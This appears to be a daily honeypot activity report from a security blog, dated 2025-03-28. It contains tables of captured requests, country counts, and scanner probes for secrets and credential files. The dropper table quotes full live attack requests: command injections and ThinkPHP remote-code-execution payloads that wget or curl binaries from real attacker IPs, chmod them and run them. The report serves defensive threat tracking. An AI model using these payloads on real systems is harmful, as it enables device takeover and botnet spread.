Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-03-28

·589 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-03-28
#

Interaction report on http service of various honeypot around the world.

ot_simplified_report
#

Simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
AU
USDubai
CNGeorgia
CNGeorgia
US
US

botnet_dropper_behaviour
#

List of requests suspected of having stage 1 dropper behavior (programs designed to extract other files from their own code).

remote_addrrequest
31.170.22.205GET /cgi-bin/live_api.cgi?page=satellite_list&id=&ip=$(cd+/var/tmp;wget+http://31.170.22.205/dl18;curl+-O+http://31.170.22.205/dl18;sh+dl18) HTTP/1.1
87.121.84.30POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20parm7%3B%20wget%20http%3A%2F%2F193.32.162.27%2Fbins%2Fparm7%3B%20chmod%20777%20parm7%3B%20.%2Fparm7%20sex HTTP/1.1
141.98.11.27GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+arm4+efefa7;wget+http:/\x5C/176.65.134.201/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\x5C/176.65.134.201/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.1
185.191.127.222POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F45.87.43.37%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1
141.98.11.210POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20parm7%3B%20wget%20http%3A%2F%2F193.32.162.27%2Fbins%2Fparm7%3B%20chmod%20777%20parm7%3B%20.%2Fparm7%20sex HTTP/1.1
27.128.156.189GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
185.233.117.25GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://152.42.234.215/bns/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
78.183.216.35GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘rm -rf bejv86; wget http://176.65.134.201/bejv86 -O /tmp/.Aqua; chmod 777 /tmp/.Aqua; /tmp/.Aqua thinkphp.selfrep’ HTTP/1.1
220.170.80.79GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
123.157.136.106GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
45.40.228.160GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
200.81.185.179GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://157.230.218.54/bins/nine.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1

request
#

List of requests of the day that have never been detected, other requests that have already been detected and archived in the request database..

number_of_occurencerequest
2452CNXN\x00\x00\x00\x01\x00\x10\x00\x00\x07\x00\x00\x002\x02\x00\x00\xBC\xB1\xA7\xB1host::\x00
2951GET /Odin/http/call1743127399 HTTP/1.1
2961GET /OdinHttpCall1743127399 HTTP/1.1
2971GET /odinhttpcall1743127399 HTTP/1.1
3061GET /Odin/http/call1743128020 HTTP/1.1
3071GET /OdinHttpCall1743128020 HTTP/1.1
3081GET /odinhttpcall1743128020 HTTP/1.1
3121\x00\x0E8\xBE\xA3\x8A\xD4\xCB(\x0C\xB4\x00\x00\x00\x00\x00
3131\x00\x0E\x08\xBE\xA3\x8A\xD4\xCB(\x0C\xB4\x00\x00\x00\x00\x00
3911GET /socket.io/1/?t=1743146321861 HTTP/1.1
3941GET /socket.io/1/?t=1743146338760 HTTP/1.1
3951GET /ban.php HTTP/1.1
4371\xA4\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x00\x00\x00\x00\x00\x00\x00\x1A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x00\x00\x00\x00\x00\x00\x00\x1B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x00\x00\x00\x00\x00\x00\x00\x1D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x00\x00\x00\x00\x00\x00\x00\x1E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x00\x00\x00\x00\x00\x00\x00\x1F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x00\x00\x00\x00\x00\x00\x00!\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x00\x00\x00\x00\x00\x00\x00’\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
4431GET /Media/Images/1FCA38A3.JPG HTTP/1.1
4491GET /JcWX HTTP/1.1
4531GET /nmaplowercheck1743184646 HTTP/1.1
4611GET /NmapUpperCheck1743184646 HTTP/1.1
5031GET /Nmap/folder/check1743184646 HTTP/1.1
5311GET /odinhttpcall1743146883 HTTP/1.1
5321GET /OdinHttpCall1743146883 HTTP/1.1
5331GET /Odin/http/call1743146883 HTTP/1.1
5561GET /phpinfo/php-details.php HTTP/1.1
5581GET /phpinformation HTTP/1.1
5601GET /secret HTTP/1.1
5611GET /secret.txt HTTP/1.1
5621GET /secret_keys HTTP/1.1
5641GET /secrets.hjson HTTP/1.1
5661GET /secrets.kdbx HTTP/1.1
5671GET /secrets.pgp HTTP/1.1
5681GET /secrets.xml HTTP/1.1
5691GET /secrets.yaml HTTP/1.1
5701GET /server/phpinfo.php HTTP/1.1
5721GET /secrets.cson HTTP/1.1
5811GET /php/phpinfo.php HTTP/1.1
5831GET /credentials.cfg HTTP/1.1
5841GET /credentials.hjson HTTP/1.1
5861GET /credentials.xml HTTP/1.1
5881GET /info/phpinfo HTTP/1.1
5891GET /info/phpinfo.php HTTP/1.1
5901GET /php-info HTTP/1.1
5911\x00\x0E8\xF1\xF8\xF3S\xA1\x17K\x9E\x00\x00\x00\x00\x00

country_iso_code
#

List of country names and number of requests received by IPs located in these countries.

number_of_occurencecountry_iso_code
0913NL
1324US
2203AU
3190CN
4151GB
5127HK
6125BG
7122DE
870LT
967RU
1060PL
1147CH
1246FI
1337FR
1437SC
1536SG
1620NG
1716JP
1816CA
1915PT
2014ID
2114TR
228VN
237BE
247UA
257NO
266KR
276IT
286IN
295GH
305BR
315TW
324IR
333IE
343MC
353LV
362AO
372AE
382AZ
391GR
401BD
411CY
421AR

Related

Report: 2025-03-27
·530 words
Repport Daily
Report: 2025-03-26
·2766 words
Repport Daily
Report: 2025-03-25
·553 words
Repport Daily